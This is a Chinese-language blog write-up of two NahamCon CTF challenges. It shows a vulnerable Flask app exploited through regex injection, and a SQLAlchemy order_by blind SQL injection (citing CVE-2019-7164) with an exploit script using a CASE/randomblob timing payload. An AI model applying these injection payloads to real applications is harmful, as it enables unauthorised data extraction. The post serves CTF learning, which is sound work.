【NahamconCTF】 Personnel and Flaskmetal Alchemist

这是两道题目的WP合集,由于我只打了这两道题,所以就不分开写了(丢人)
file

Personnel

app.py

#!/usr/bin/env python
from flask import Flask, Response, abort, request, render_template
import random
from string import *
import re
app = Flask(__name__)
flag = open("flag.txt").read()
users = open("users.txt").read()
users += flag
@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "GET":
        return render_template("lookup.html")
    if request.method == "POST":
        name = request.form["name"]
        setting = int(request.form["setting"])
        if name:
            if name[0].isupper():
                name = name[1:]
        results = re.findall(r"[A-Z][a-z]*?" + name + r"[a-z]*?\n", users, setting)
        results = [x.strip() for x in results if x or len(x) > 1]
        return render_template("lookup.html", passed_results=True, results=results)
if __name__ == "__main__":
    app.run()

users.txt

miku
viewofthai

flag.txt

flag{xxxxxxxxxx}

审计下代码,只有一个注入点,name = request.form["name"]
于是运用Regex101构造正则表达式

\nflag{[^\s]*?[\}\

就出了(正则表达式的熟练运用题)

Flaskmetal Alchemist

这一题代码过长我就不放了,也许我会放个压缩包
题目压缩包fma.zip
app.py

from sqlalchemy import text
····
            metals = Metal.query.filter(
                Metal.name.like("%{}%".format(search))
            ).order_by(text(order))
····

主要有用的就这一些,sqlalchemy出现过order_by漏洞
CVE-2019-7164
Sqlalchemy-Github-issues
有什么好说的,直接开注!
在测试中,无法报错注入,于是只能bool盲注
file
exp

from flask import Flask, render_template, request, url_for, redirect
from models import Metal
from database import db_session, init_db
from seed import seed_db
from sqlalchemy import text
seed_db()
search = "Lu"
order = f" case when 1=1 then 0 else randomblob(100000000000000) end "
metals = Metal.query.filter(Metal.name.like("% {}%".format(search))).order_by(text(order))
print(metals)
for item in metals:
    print(item.name)

然后爆就完了(不想自己写,抢miku的wp来用了~)
file

发布者

正汰

永远是这样,山前面是山,天空上面是天空,道路前面还是道路,迷茫之后还有迷茫。

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注